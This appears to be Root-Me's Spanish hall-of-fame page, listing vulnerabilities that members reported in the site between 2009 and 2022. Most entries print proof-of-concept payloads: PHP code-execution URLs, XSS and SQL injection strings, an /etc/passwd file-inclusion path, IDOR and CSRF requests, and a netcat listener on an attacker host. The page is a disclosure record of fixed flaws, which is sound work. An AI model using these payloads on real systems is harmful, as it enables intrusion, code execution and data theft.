Debilidades descubiertas

Como en cualquier sistema de información, se detectaron algunos puntos débiles en el sitio web.

27/08/2022 Laluka

la identificación de una vulnerabilidad o el paso de un contenido del sitio a un estado "superior", (de borrador a evaluación, o de basura a escritura) desencadena el envío de un correo electrónico al autor o al administrador. Algunas variables (título, contenido, ...) no se escapaban correctamente y se pasaban a la función eval antes de enviar el correo electrónico, permitiendo la ejecución de código.

send(eval($email));

21/07/2022 Abyss Watcher& SpawnZii

han identificado una vulnerabilidad de ejecución remota de código (RCE) que permite a un usuario privilegiado ejecutar código PHP:

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>

Abyss Watcher SpawnZii

11/07/2022 Abyss Watcher

identificó una vulnerabilidad XSS almacenada explotable con un iframe alojado en el dominio RM :

<iframe src="https://www.root-me.org/IMG/html/xss.html">

17/03/2022 Mizu

identificó una vulnerabilidad XSS almacenada explotable con un iframe alojado en un dominio malicioso que comienza con www.root-me.org :

<iframe src="https://www.root-me.org.evil.domain/">

23/11/2021 zLade

identificó una vulnerabilidad que permitía a un miembro de la asociación elevar su rol a administrador simplemente utilizando la interfaz privada de SPIP.

01/10/2021 Podalirius

identificó una vulnerabilidad que permitía el acceso a los documentos adjuntos a las soluciones sin restricciones:

<imgXX>

15/05/2020 Laluka

identificó múltiples vulnerabilidades : 3 XSS reflejadas, 2 SQLi y 1 RCE :

https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=
https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E
https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>
https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--
/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-
https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

12/01/2020 NonStandardModel

identificó una vulnerabilidad XSS en el nombre del archivo importado en http://repository.root-me.org/

04/06/2019 x code

identificó una vulnerabilidad XSS. Esta requería una intervención del usuario en el chatbox (un clic en la página anterior).

http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>

04/06/2019 x code

ha identificado una vulnerabilidad que permite matar, con un usuario sin privilegios, la base de datos disponible en el servidor challenge01 que aloja varios desafíos, saturando la memoria de una manera particular para matar el proceso de su elección. Esto permitió reiniciar otro binario en su lugar escuchando en el mismo puerto a través de una condición de carrera.

16/11/2018 Shrewk

identificó una vulnerabilidad que permitía atrapar a los usuarios de la tienda a través de un iframe mediante un dominio de spreadshirt controlado por el atacante (por ejemplo, spreadshirt.ro), el parámetro lang no se filtraba correctamente.

12/04/2018 DrStache& urandom

identificaron una vulnerabilidad XSS almacenada en el mapa de OSM en las salas de CTFATD al inyectar el siguiente payload en la biografía del usuario (https://www.root-me.org/?page=preferences&lang=en)

<svg onload=console.log(document.domain)>

DrStache urandom

12/10/2015 ST4HLKR1EG

ha identificado una vulnerabilidad "Insecure Direct Object Reference" que permite leer cualquier mensaje privado :

page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]

03/2015 WtF

ha identificado una vulnerabilidad de ejecución remota de código (RCE) en un reto que está siendo evaluado en el servidor de producción, permitiendo acceder al sistema de archivos con ssh y ejecutar comandos.

03/2015 WtF

ha identificado una vulnerabilidad de inclusión de archivos arbitrarios (LFI) en el desafío del servidor web Path Truncation que permite leer archivos de otros desafíos.

15/06/2013

LouTerraillouneha identificado una vulnerabilidad de inyección de código PHP en la página "code - decode":

Texto a decodificar en base64 :

PD9waHAgcGhwaW5mbygpOyA/Pg==

06/11/2012 jimee

encontró varios XSS almacenados en la gestión de perfiles de usuario :

<script>[code javascript/vbscript]</script>

20/03/2012 jimee

encontró un LFI en un desafío :

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

23/10/2011 courte66

encontró un XSS reflejado en la página "encode - decode" :

Texto a decodificar en base64

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

02/10/2011 Hypnoze

encontró una referencia indirecta insegura a un objeto que conducía a un acceso no autorizado a todos los PM :

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]

11/07/2011 Armel

encontró un XSS almacenado en el chatbox.

<iframe src="javascript:[code javascript]' />

18/07/2011 g0uZ

encontró una vulnerabilidad de inyección de código PHP en las "herramientas en línea : nmap"

Anfitrión para escanear en modo -sV :

--version-trace -p8888 [IP server attacker]

Servicio de escucha en el servidor del atacante

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

30/06/2011 elyfean

encontró un CSRF en el chatbox :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

15/02/2011 EsSandre

encontró un LFI :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

02/02/2011 hello

encontró varios XSS almacenados en el sistema PM :

<script>[code javascript/vbscript]</script>

02/12/2009 real

encontró una vulnerabilidad de inyección de código :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'